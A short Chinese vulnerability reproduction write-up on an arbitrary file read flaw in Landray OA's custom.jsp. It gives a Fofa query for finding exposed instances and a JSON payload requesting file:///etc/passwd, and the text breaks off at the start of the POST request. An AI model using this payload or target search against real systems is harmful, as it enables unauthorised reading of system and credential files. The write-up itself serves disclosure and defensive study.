一、 漏洞分析
1.1 应用简介
蓝凌软件全称深圳市蓝凌软件股份有限公司,于2001年在深圳科技园成立。蓝凌是国内知名的大平台OA服务商和国内领先的知识管理解决方案提供商,是专业从事组织的知识化咨询、软件研发、实施、技术服务的国家级高新技术企业,近期Landray-OA系统被爆出存任意文件读取漏洞。
1.2 漏洞描述
蓝凌OA custom.jsp 存在任意文件读取漏洞。
1.3 环境准备
Fofa查询语句
app=”Landray-OA系统”
可打开进入登录页面
1.4 漏洞复现
构造payload发送
var={“body”:{“file”:”file:///etc/passwd”}}
漏洞payload为
POST /sys/ui/